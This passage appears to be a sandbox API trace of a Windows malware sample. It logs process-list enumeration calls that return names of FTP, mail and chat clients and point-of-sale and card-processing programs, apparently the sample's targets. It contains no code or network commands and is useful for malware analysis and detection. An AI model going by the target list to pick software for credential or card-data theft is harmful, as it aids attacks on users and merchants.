pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0179.371] Process32Next (in: hSnapshot=0xcb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0179.374] Process32Next (in: hSnapshot=0xcb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0179.378] Process32Next (in: hSnapshot=0xcb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0179.383] Process32Next (in: hSnapshot=0xcb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0179.386] Process32Next (in: hSnapshot=0xcb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0179.388] Process32Next (in: hSnapshot=0xcb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0179.390] Process32Next (in: hSnapshot=0xcb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0179.392] Process32Next (in: hSnapshot=0xcb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0179.395] Process32Next (in: hSnapshot=0xcb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0179.397] Process32Next (in: hSnapshot=0xcb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0179.399] Process32Next (in: hSnapshot=0xcb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0179.403] Process32Next (in: hSnapshot=0xcb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0179.406] Process32Next (in: hSnapshot=0xcb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0179.408] Process32Next (in: hSnapshot=0xcb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0179.410] Process32Next (in: hSnapshot=0xcb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0179.412] Process32Next (in: hSnapshot=0xcb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0179.414] Process32Next (in: hSnapshot=0xcb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0179.416] Process32Next (in: hSnapshot=0xcb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0179.418] Process32Next (in: hSnapshot=0xcb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0179.420] Process32Next (in: hSnapshot=0xcb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0179.426] Process32Next (in: hSnapshot=0xcb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0179.428] Process32Next (in: hSnapshot=0xcb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0179.430] Process32Next (in: hSnapshot=0xcb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0179.433] Process32Next (in: hSnapshot=0xcb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0179.435] Process32Next (in: hSnapshot=0xcb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0179.438] Process32Next (in: hSnapshot=0xcb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0179.440] Process32Next (in: hSnapshot=0xcb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0179.442] Process32Next (in: hSnapshot=0xcb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0179.445] Process32Next (in: hSnapshot=0xcb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0179.447] Process32Next (in: hSnapshot=0xcb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0179.449] Process32Next (in: hSnapshot=0xcb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0179.451] Process32Next (in: hSnapshot=0xcb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0179.453] Process32Next (in: hSnapshot=0xcb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0179.456] Process32Next (in: hSnapshot=0xcb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0179.458] Process32Next (in: hSnapshot=0xcb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0179.460] Process32Next (in: hSnapshot=0xcb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0179.466] Process32Next (in: hSnapshot=0xcb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0179.469] Process32Next (in: hSnapshot=0xcb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0179.471] Process32Next (in: hSnapshot=0xcb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0179.473] Process32Next (in: hSnapshot=0xcb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0179.475] Process32Next (in: hSnapshot=0xcb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0179.477] Process32Next (in: hSnapshot=0xcb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0179.479] Process32Next (in: hSnapshot=0xcb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0179.482] Process32Next (in: hSnapshot=0xcb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0179.484] Process32Next (in: hSnapshot=0xcb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0179.486] Process32Next (in: hSnapshot=0xcb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0179.488] Process32Next (in: hSnapshot=0xcb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0179.490] Process32Next (in: hSnapshot=0xcb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0179.492] Process32Next (in: hSnapshot=0xcb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0179.494] Process32Next (in: hSnapshot=0xcb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 0 [0179.495] CloseHandle (hObject=0xcb8) returned 1 [0179.496] Sleep (dwMilliseconds=0x64) [0179.608] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1234 [0179.624] Process32First (in: hSnapshot=0x1234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0179.626] Process32Next (in: hSnapshot=0x1234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0179.628] Process32Next (in: hSnapshot=0x1234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0179.631] Process32Next (in: hSnapshot=0x1234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0179.633] Process32Next (in: hSnapshot=0x1234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0179.635] Process32Next (in: hSnapshot=0x1234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0179.638] Process32Next (in: hSnapshot=0x1234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0179.640] Process32Next (in: hSnapshot=0x1234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0179.642] Process32Next (in: hSnapshot=0x1234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0179.687] Process32Next (in: hSnapshot=0x1234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0179.689] Process32Next (in: hSnapshot=0x1234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0179.693] Process32Next (in: hSnapshot=0x1234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0179.695] Process32Next (in: hSnapshot=0x1234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0179.699] Process32Next (in: hSnapshot=0x1234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0179.701] Process32Next (in: hSnapshot=0x1234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0179.702] Process32Next (in: hSnapshot=0x1234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0179.704] Process32Next (in: hSnapshot=0x1234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0179.706] Process32Next (in: hSnapshot=0x1234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0179.709] Process32Next (in: hSnapshot=0x1234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0179.711] Process32Next (in: hSnapshot=0x1234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0179.713] Process32Next (in: hSnapshot=0x1234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0179.716] Process32Next (in: hSnapshot=0x1234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0179.718] Process32Next (in: hSnapshot=0x1234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0179.720] Process32Next (in: hSnapshot=0x1234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0179.722] Process32Next (in: hSnapshot=0x1234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0179.781] Process32Next (in: hSnapshot=0x1234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0179.784] Process32Next (in: hSnapshot=0x1234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0179.786] Process32Next (in: hSnapshot=0x1234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0179.788] Process32Next (in: hSnapshot=0x1234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0179.790] Process32Next (in: hSnapshot=0x1234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0179.792] Process32Next (in: hSnapshot=0x1234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0179.794] Process32Next (in: hSnapshot=0x1234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0179.808] Process32Next (in: hSnapshot=0x1234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0179.810] Process32Next (in: hSnapshot=0x1234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, 